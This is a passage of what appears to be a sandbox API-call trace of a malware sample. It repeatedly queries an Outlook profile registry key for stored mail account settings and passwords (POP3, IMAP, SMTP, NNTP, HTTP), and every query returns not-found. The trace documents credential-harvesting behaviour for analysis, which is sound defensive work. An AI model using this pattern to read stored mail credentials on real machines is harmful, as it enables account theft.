lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.303] RegCloseKey (hKey=0x95c) returned 0x0 [0249.303] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.303] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.303] RegCloseKey (hKey=0x95c) returned 0x0 [0249.303] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.304] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.304] RegCloseKey (hKey=0x95c) returned 0x0 [0249.304] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.304] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.304] RegCloseKey (hKey=0x95c) returned 0x0 [0249.304] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.304] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.304] RegCloseKey (hKey=0x95c) returned 0x0 [0249.304] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.304] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.304] RegCloseKey (hKey=0x95c) returned 0x0 [0249.304] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.304] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.304] RegCloseKey (hKey=0x95c) returned 0x0 [0249.304] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.304] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.304] RegCloseKey (hKey=0x95c) returned 0x0 [0249.304] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.304] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.304] RegCloseKey (hKey=0x95c) returned 0x0 [0249.304] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.304] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.305] RegCloseKey (hKey=0x95c) returned 0x0 [0249.305] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.305] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.305] RegCloseKey (hKey=0x95c) returned 0x0 [0249.305] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.305] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.305] RegCloseKey (hKey=0x95c) returned 0x0 [0249.305] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.305] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.305] RegCloseKey (hKey=0x95c) returned 0x0 [0249.305] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.305] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.305] RegCloseKey (hKey=0x95c) returned 0x0 [0249.305] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.305] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.305] RegCloseKey (hKey=0x95c) returned 0x0 [0249.305] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.306] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.306] RegCloseKey (hKey=0x95c) returned 0x0 [0249.306] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.306] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.306] RegCloseKey (hKey=0x95c) returned 0x0 [0249.306] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.306] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.306] RegCloseKey (hKey=0x95c) returned 0x0 [0249.306] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.306] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.306] RegCloseKey (hKey=0x95c) returned 0x0 [0249.306] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.306] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password2", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.306] RegCloseKey (hKey=0x95c) returned 0x0 [0249.306] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.306] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.306] RegCloseKey (hKey=0x95c) returned 0x0 [0249.306] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.306] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.306] RegCloseKey (hKey=0x95c) returned 0x0 [0249.306] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.306] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.306] RegCloseKey (hKey=0x95c) returned 0x0 [0249.306] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.307] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.307] RegCloseKey (hKey=0x95c) returned 0x0 [0249.307] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.307] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Password", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.307] RegCloseKey (hKey=0x95c) returned 0x0 [0249.307] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.307] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.307] RegCloseKey (hKey=0x95c) returned 0x0 [0249.307] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.307] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.307] RegCloseKey (hKey=0x95c) returned 0x0 [0249.307] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x201, phkResult=0x1c4e568 | out: phkResult=0x1c4e568*=0x95c) returned 0x0 [0249.307] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Port", lpReserved=0x0, lpType=0x1c4e558, lpData=0x1c4e550, lpcbData=0x1c4e560*=0x4 | out: lpType=0x1c4e558*=0x0, lpData=0x1c4e550*=0x0, lpcbData=0x1c4e560*=0x4) returned 0x2 [0249.307] RegCloseKey (hKey=0x95c) returned 0x0 [0249.307] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.307] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.307] RegCloseKey (hKey=0x95c) returned 0x0 [0249.307] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.307] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.307] RegCloseKey (hKey=0x95c) returned 0x0 [0249.307] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.307] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.307] RegCloseKey (hKey=0x95c) returned 0x0 [0249.307] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.308] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.308] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Email Address", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.308] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.308] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="NNTP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.308] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.308] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.308] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="Email", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.308] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.308] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.308] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTP Server URL", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="POP3 User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="IMAP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail User Name", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="HTTPMail Server", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, phkResult=0x1c4e4d0 | out: phkResult=0x1c4e4d0*=0x95c) returned 0x0 [0249.309] RegQueryValueExA (in: hKey=0x95c, lpValueName="SMTP User", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0 | out: lpType=0x0, lpData=0x0, lpcbData=0x1c4e508*=0x0) returned 0x2 [0249.309] RegCloseKey (hKey=0x95c) returned 0x0 [0249.309] RegOpenKeyExA (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b4c13fbaf5f22f44b93e8bdd93521484", ulOptions=0x0, samDesired=0x101, 